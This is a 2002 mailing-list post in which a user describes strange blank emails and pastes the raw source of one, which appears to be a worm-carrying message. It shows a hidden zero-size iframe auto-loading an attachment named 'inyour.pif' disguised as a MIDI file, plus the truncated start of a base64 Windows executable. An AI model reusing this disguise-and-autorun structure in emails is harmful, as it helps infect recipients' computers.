For the past week or so, I have received several very strange emails. Let 
me try to explain, but keep in mind that I am not sure that I can 
describe the problem fully. I have received several emails that according 
to "Mail Siphon" are large enough to contain an attachment, yet there is 
no attachment listed nor do I find one in the download folder. For 
example, the header info below (from Mail Siphon) is from an email that 
is listed as 144.9KB, yet there is no attachment and no text in the body 
of the email. I don't know the sender, yet when I trace the return 
address by searching the web, it turns out to be someone here in my 
hometown.

I have received serveral of these, sometimes from different people but 
they all contain "Return-Path: <[EMAIL PROTECTED]" in the 
header, no attachements, and no text in the body. None of these seems 
intended for me and they don't appear to be spam.

A couple of details - My actual email address is "[EMAIL PROTECTED]", 
but I have a forwarding service so that my mailed is addressed to 
"[EMAIL PROTECTED]" and then forwarded to me. I have a dial-up connection 
and use Emailer 2.0.3. I'm not a techie, so the header info below is 
mostly gobbly-gook to me.

I am very curious to find out what is going on, any ideas?

Charles Larkins





>--Boundary_(ID_F4tGl9567xRCX9iZEHY21A)
>Content-type: text/html
>Content-transfer-encoding: 7BIT
>
><HTML><HEAD></HEAD><BODY>
><iframe src=cid:V88FH8WhF3 height=0 width=0>
></iframe>
><FONT></FONT></BODY></HTML>
>
>--Boundary_(ID_F4tGl9567xRCX9iZEHY21A)
>Content-id: <V88FH8WhF3>
>Content-type: audio/x-midi; name=inyour.pif
>Content-transfer-encoding: base64
>Content-disposition: attachment; filename=inyour.pif
>
>TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
>RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
>GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
>UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
>QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA
>ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ
>
>
>---------------------- RFC822 Headers  ---------------------
>Return-Path: <[EMAIL PROTECTED]>
>Received: from dolly1.pobox.com (dolly1.pobox.com [207.106.49.22])
>       by home.msen.com (8.9.3/8.9.3) with ESMTP id JAA19082
>       for <[EMAIL PROTECTED]>; Sun, 12 May 2002 09:54:54 -0400 (EDT)
>       (envelope-from [EMAIL PROTECTED])
>Received: from dolly1.pobox.com (localhost.localdomain [127.0.0.1])
>       by dolly1.pobox.com (Postfix) with ESMTP id 7D32A2BF78
>       for <[EMAIL PROTECTED]>; Sun, 12 May 2002 09:54:55 -0400 (EDT)
>Delivered-To: [EMAIL PROTECTED]
>Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2])
>       by dolly1.pobox.com (Postfix) with ESMTP id 680A92BF26
>       for <[EMAIL PROTECTED]>; Sun, 12 May 2002 09:54:54 -0400 (EDT)
>Received: from Oqolj (bgp01080194bgs.wanarb01.mi.comcast.net [68.40.145.99])
> by mtaout06.icomcast.net
> (iPlanet Messaging Server 5.1 HotFix 0.6 (built Apr 26 2002))
> with SMTP id <[EMAIL PROTECTED]> for [EMAIL PROTECTED];
> Sun, 12 May 2002 09:54:54 -0400 (EDT)
>Date: Sun, 12 May 2002 09:54:42 -0400 (EDT)
>Date-warning: Date header was inserted by mtaout06.icomcast.net
>From: Nawagirl <[EMAIL PROTECTED]>
>Subject: Re:larkins,meeting notice
>To: [EMAIL PROTECTED]
>Message-id: <[EMAIL PROTECTED]>
>MIME-version: 1.0
>Content-type: multipart/alternative;
> boundary="Boundary_(ID_F4tGl9567xRCX9iZEHY21A)"
>X-UIDL: 46378600cc41f0aa0b31edcdc7f885db

___________________________________________________________________________
To unsubscribe send a mail message with a SUBJECT line of "unsubscribe" to
<[EMAIL PROTECTED]>  or  <[EMAIL PROTECTED]>

Reply via email to